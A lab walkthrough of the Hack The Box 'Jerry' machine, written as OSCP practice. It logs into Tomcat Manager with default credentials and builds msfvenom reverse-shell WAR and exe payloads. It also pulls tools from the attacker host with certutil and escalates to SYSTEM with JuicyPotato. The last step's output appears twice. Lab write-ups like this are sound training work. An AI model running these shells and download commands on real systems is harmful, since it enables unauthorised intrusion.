In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
nmap scan
# Nmap 7.94 scan initiated Sat Oct 21 22:38:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/results/10.10.10.95/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.95/scans/xml/_quick_tcp_nmap.xml 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 22:38:39 EDT for 37s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 22:39:16 2023 -- 1 IP address (1 host up) scanned in 44.12 seconds
Full nmap scan
# Nmap 7.94 scan initiated Sat Oct 21 22:38:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/results/10.10.10.95/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/results/10.10.10.95/scans/xml/_full_tcp_nmap.xml 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-21 22:38:39 EDT for 264s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 21 22:43:03 2023 -- 1 IP address (1 host up) scanned in 271.18 seconds
nikto scan
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.95
+ Target Hostname: 10.10.10.95
+ Target Port: 8080
+ Start Time: 2023-10-21 22:39:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected).
+ /manager/status: Tomcat Server Status interface found (pass protected).
+ 7775 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-10-21 23:27:25 (GMT-4) (2886 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
able to log in to teh apache with tomcat and S3cret as per nikto enumeration
Seen that we can upload war files and on research i seen we can create a WAR shell. example i seen is from — https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=443 -f war -o exploit.war
╰─$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.4 lport=443 -f war -o exploit.war
Payload size: 13312 bytes
Final size of war file: 13312 bytes
Saved as: exploit.war
╭─kali@kali ~/HTB/jerry
╰─$
we get a shell
╭─kali@kali ~/HTB/jerry
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.95] 49198
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>
systeminfo
C:\apache-tomcat-7.0.88>systeminfo
systeminfo
Host Name: JERRY
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00112-46014-AA570
Original Install Date: 6/18/2018, 11:30:45 PM
System Boot Time: 10/21/2023, 10:10:23 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,224 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,996 MB
Virtual Memory: In Use: 803 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 142 Hotfix(s) Installed.
whoami
C:\apache-tomcat-7.0.88>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
with this "SeImpersonatePrivilege" looks like a candidate for a juicy potato
shell
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 -a x64 --platform windows LPORT=444 EXITFUNC=thread -f exe -o shell.exe
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/jerry
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
C:\Users\Public>cd downloads
cd downloads
C:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
certutil -urlcache -f http://10.10.14.4:90/shell.exe C:\Users\Public\Downloads\shell.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.4:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public\Downloads>
Run Juicy
C:\Users\Public\Downloads>JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 443
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\Users\Public\Downloads>whoami
whoami
nt authority\system
C:\Users\Public\Downloads>
we get admin
C:\Users\Public\Downloads>JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
JuicyPotato.exe -t * -p C:\Users\Public\Downloads\shell.exe -l 443
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 443
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\Users\Public\Downloads>whoami
whoami
nt authority\system
C:\Users\Public\Downloads>